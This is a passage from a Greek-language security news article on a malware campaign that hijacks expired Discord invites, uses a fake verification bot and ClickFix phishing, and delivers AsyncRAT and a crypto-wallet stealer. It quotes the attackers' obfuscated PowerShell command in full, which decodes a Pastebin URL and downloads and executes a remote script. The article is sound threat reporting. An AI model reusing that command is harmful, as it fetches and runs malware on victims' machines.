Εκμετάλλευση Ληγμένων Προσκλήσεων Discord για Διάδοση Πολυσταδιακού Κακόβουλου Λογισμικού

Η νέα απειλή στον κόσμο του Discord

Οι κυβερνοεγκληματίες έχουν ανακαλύψει έναν εξελιγμένο τρόπο επίθεσης, εκμεταλλευόμενοι μια κρίσιμη αδυναμία στο σύστημα προσκλήσεων του Discord. Αυτή η αδυναμία τους επιτρέπει να καταλαμβάνουν ληγμένες προσκλήσεις και να ανακατευθύνουν ανυποψίαστους χρήστες σε κακόβουλους διακομιστές που φιλοξενούν προηγμένες καμπάνιες κακόβουλου λογισμικού.

Η απειλή αυτή εκμεταλλεύεται τη φήμη του Discord ως αξιόπιστης πλατφόρμας, που χρησιμοποιείται από εκατομμύρια gamers και κοινότητες παγκοσμίως. Οι κυβερνοεγκληματίες μπορούν να παραβιάσουν θύματα μέσω προσκλήσεων που κάποτε ήταν νόμιμες και είχαν κοινοποιηθεί σε φόρουμ, κοινωνικά μέσα ή επίσημους ιστότοπους.

Εκμετάλλευση του συστήματος προσκλήσεων

Η αλυσίδα επίθεσης ξεκινά όταν οι επιτιθέμενοι εκμεταλλεύονται το σύστημα προσαρμοσμένων προσκλήσεων του Discord, το οποίο είναι διαθέσιμο αποκλειστικά σε διακομιστές με συνδρομές premium Level 3 Boost. Όταν οι νόμιμοι διακομιστές χάνουν το status boost ή όταν λήγουν προσωρινές προσκλήσεις, οι κωδικοί προσκλήσεων γίνονται διαθέσιμοι για επαναχρησιμοποίηση από κακόβουλους χρήστες, που μπορούν να τους καταχωρήσουν ως προσαρμοσμένα vanity URLs για τους δικούς τους ενισχυμένους διακομιστές.

Η επικινδυνότητα της ανακατεύθυνσης

Αυτό δημιουργεί ένα επικίνδυνο σενάριο, όπου οι χρήστες που κάνουν κλικ σε προσκλήσεις που θεωρούνται αξιόπιστες ανακατευθύνονται σε διακομιστές Discord που ελέγχονται από επιτιθέμενους και έχουν σχεδιαστεί να φαίνονται νόμιμοι. Οι ερευνητές της Check Point εντόπισαν αυτή την ενεργή καμπάνια κακόβουλου λογισμικού τον Ιούνιο του 2025, αποκαλύπτοντας πώς οι επιτιθέμενοι έχουν εκμεταλλευτεί αυτή την ευπάθεια του Discord για να αναπτύξουν εξελιγμένα phishing σχήματα και πολυσταδιακές μολύνσεις κακόβουλου λογισμικού.

Πολυσταδιακή μόλυνση και τεχνική πολυπλοκότητα

Η ερευνητική ομάδα παρατήρησε επιθέσεις στον πραγματικό κόσμο, όπου οι κυβερνοεγκληματίες οργάνωσαν προσεκτικά πολλαπλά στάδια μόλυνσης, σχεδιασμένα να αποφεύγουν την ανίχνευση από εργαλεία antivirus και συστήματα ασφαλείας sandbox. Η καμπάνια παρουσιάζει αξιοσημείωτη τεχνική πολυπλοκότητα, συνδυάζοντας την τεχνική phishing ClickFix με πολυσταδιακούς φορτωτές και χρονικές παρακάμψεις για να παραδώσει αθόρυβα το ισχυρό trojan απομακρυσμένης πρόσβασης AsyncRAT, μαζί με μια προσαρμοσμένη παραλλαγή του Skuld Stealer που στοχεύει συγκεκριμένα πορτοφόλια κρυπτονομισμάτων.

Η χρήση αξιόπιστων υπηρεσιών cloud

Αυτό που καθιστά αυτή την επιχείρηση ιδιαίτερα δόλια είναι ότι η παράδοση φορτίου και η εξαγωγή δεδομένων πραγματοποιούνται αποκλειστικά μέσω αξιόπιστων υπηρεσιών cloud όπως το GitHub, το Bitbucket, το Pastebin και το ίδιο το Discord. Αυτό επιτρέπει στην κακόβουλη κίνηση να ενσωματωθεί ομαλά στη συνήθη δικτυακή δραστηριότητα και να αποφύγει την ενεργοποίηση συναγερμών ασφαλείας.

Η κλίμακα και ο αντίκτυπος της καμπάνιας

Η κλίμακα και ο αντίκτυπος αυτής της καμπάνιας είναι σημαντικά, με στατιστικά στοιχεία λήψεων από πλατφόρμες φιλοξενίας να δείχνουν ότι ο αριθμός των πιθανών θυμάτων ξεπερνά τα 1.300 σε πολλές χώρες, συμπεριλαμβανομένων των Ηνωμένων Πολιτειών, του Βιετνάμ, της Γαλλίας, της Γερμανίας και του Ηνωμένου Βασιλείου. Η εστίαση των επιτιθέμενων σε κακόβουλο λογισμικό που σχετίζεται με κρυπτονομίσματα υποδηλώνει ότι πρωταρχικό τους κίνητρο είναι το οικονομικό κέρδος, στοχεύοντας χρήστες κρυπτονομισμάτων και τα ψηφιακά τους περιουσιακά στοιχεία.

Ο μηχανισμός κοινωνικής μηχανικής ClickFix

Ο μηχανισμός μόλυνσης που χρησιμοποιείται σε αυτή την καμπάνια αποτελεί ένα μάθημα κοινωνικής μηχανικής, χρησιμοποιώντας μια εκλεπτυσμένη τεχνική γνωστή ως ClickFix για να χειραγωγήσει τα θύματα ώστε να εκτελέσουν κακόβουλο κώδικα εθελοντικά. Μόλις οι χρήστες ενταχθούν στον καταληφθέντα διακομιστή Discord, αντιμετωπίζουν αυτό που φαίνεται να είναι μια νόμιμη διαδικασία επαλήθευσης που διαχειρίζεται ένα bot με το όνομα “Safeguard”, το οποίο δημιουργήθηκε ειδικά για αυτή την καμπάνια την 1η Φεβρουαρίου 2025.

Η διαδικασία επαλήθευσης και η εκμετάλλευση του PowerShell

Όταν τα θύματα κάνουν κλικ στο κουμπί επαλήθευσης, ανακατευθύνονται σε έναν εξωτερικό phishing ιστότοπο στο captchaguard[.]me, ο οποίος παρουσιάζει μια εξελιγμένη αναπαραγωγή της διεπαφής χρήστη του Discord. Ο ιστότοπος εμφανίζει ένα ψεύτικο Google CAPTCHA που φαίνεται να αποτυγχάνει να φορτώσει, προτρέποντας τους χρήστες να εκτελέσουν χειροκίνητα βήματα “επαλήθευσης”. Το JavaScript σε αυτή τη κακόβουλη σελίδα αντιγράφει σιωπηλά μια εντολή PowerShell στο πρόχειρο του χρήστη χωρίς τη γνώση του.

Η αντιγραμμένη εντολή PowerShell καταδεικνύει την τεχνική δεξιότητα των επιτιθέμενων μέσω των τεχνικών απόκρυψης:

powershell -NoExit -Command "$r="NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa";$u=($r[-1..-($r.Length)]-join '');$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));iex (iwr -Uri $url)"

Αυτή η εντολή χρησιμοποιεί αντιστροφή συμβολοσειράς και αποκωδικοποίηση Base64 για να αποκρύψει μια διεύθυνση URL του Pastebin, η οποία όταν εκτελείται κατεβάζει ένα σενάριο PowerShell που ξεκινά την αλυσίδα μόλυνσης κακόβουλου λογισμικού.

Η αποτελεσματικότητα της κοινωνικής μηχανικής

Η κοινωνική μηχανική είναι ιδιαίτερα αποτελεσματική επειδή παρουσιάζει στους χρήστες γνωστές οδηγίες Windows – άνοιγμα του διαλόγου Run με Win+R, επικόλληση του περιεχομένου του προχείρου και πάτημα του Enter – ενέργειες που πολλοί χρήστες εκτελούν τακτικά χωρίς υποψίες. Αυτή η προσέ